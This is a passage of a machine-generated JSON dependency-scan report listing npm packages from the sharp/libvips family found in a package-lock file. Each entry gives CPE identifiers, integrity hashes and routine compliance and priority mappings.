"cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-libvips-linux-riscv64@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-riscv64/-/sharp-libvips-linux-riscv64-1.2.4.tgz", "integrity": "sha512-oVDbcR4zUC0ce82teubSm+x6ETixtKZBh/qbREIOcI3cULzDyb18Sr/Wcyx7NRQeQzOiHTNbZFF1UwPS2scyGA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "48c4bc7216358207", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-libvips-linux-s390x 1.2.4", "title": "@img/sharp-libvips-linux-s390x 1.2.4", "description": "Package discovered: @img/sharp-libvips-linux-s390x 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b12e72c485584ae0", "name": "@img/sharp-libvips-linux-s390x", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "LGPL-3.0-or-later", "spdxExpression": "LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-s390x:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-s390x:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_s390x:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_s390x:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-libvips-linux-s390x@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-s390x/-/sharp-libvips-linux-s390x-1.2.4.tgz", "integrity": "sha512-qmp9VrzgPgMoGZyPvrQHqk02uyjA0/QrTO26Tqk6l4ZV0MPWIW6LTkqOIov+J1yEu7MbFQaDpwdwJKhbJvuRxQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "79972044480a2381", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-libvips-linux-x64 1.2.4", "title": "@img/sharp-libvips-linux-x64 1.2.4", "description": "Package discovered: @img/sharp-libvips-linux-x64 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a57b531e02329e6d", "name": "@img/sharp-libvips-linux-x64", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "LGPL-3.0-or-later", "spdxExpression": "LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-x64:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux-x64:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_x64:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux_x64:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linux:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linux:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-libvips-linux-x64@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linux-x64/-/sharp-libvips-linux-x64-1.2.4.tgz", "integrity": "sha512-tJxiiLsmHc9Ax1bz3oaOYBURTXGIRDODBqhveVHonrHJ9/+k89qbLl0bcJns+e4t4rvaNBxaEZsFtSfAdquPrw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7de94e70bc6a1409", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4", "title": "@img/sharp-libvips-linuxmusl-arm64 1.2.4", "description": "Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "67f7722888e07f97", "name": "@img/sharp-libvips-linuxmusl-arm64", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "LGPL-3.0-or-later", "spdxExpression": "LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-arm64:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-arm64:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_arm64:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_arm64:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-libvips-linuxmusl-arm64@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-arm64/-/sharp-libvips-linuxmusl-arm64-1.2.4.tgz", "integrity": "sha512-FVQHuwx1IIuNow9QAbYUzJ+En8KcVm9Lk5+uGUQJHaZmMECZmOlix9HnH7n1TRkXMS0pGxIJokIVB9SuqZGGXw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c540ef9b43418974", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4", "title": "@img/sharp-libvips-linuxmusl-x64 1.2.4", "description": "Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "61da63d4bf468c4d", "name": "@img/sharp-libvips-linuxmusl-x64", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "LGPL-3.0-or-later", "spdxExpression": "LGPL-3.0-or-later", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-x64:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-x64:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_x64:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_x64:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-libvips-linuxmusl-x64@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-x64/-/sharp-libvips-linuxmusl-x64-1.2.4.tgz", "integrity": "sha512-+LpyBk7L44ZIXwz/VYfglaX/okxezESc6UxDSoyo2Ks6Jxc4Y7sGjpgU9s4PMgqgjj1gZCylTieNamqA1MF7Dg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9ac46491201655bd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-linux-arm 0.34.5", "title": "@img/sharp-linux-arm 0.34.5", "description": "Package discovered: @img/sharp-linux-arm 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "dcf7df343a75d233", "name": "@img/sharp-linux-arm", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-arm:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-arm:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_arm:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_arm:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-linux-arm@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-linux-arm/-/sharp-linux-arm-0.34.5.tgz", "integrity": "sha512-9dLqsvwtg1uuXBGZKsxem9595+ujv0sJ6Vi8wcTANSFpwV/GONat5eCkzQo/1O6zRIkh0m/8+5BjrRr7jDUSZw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f3729e97d1846b60", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-linux-arm64 0.34.5", "title": "@img/sharp-linux-arm64 0.34.5", "description": "Package discovered: @img/sharp-linux-arm64 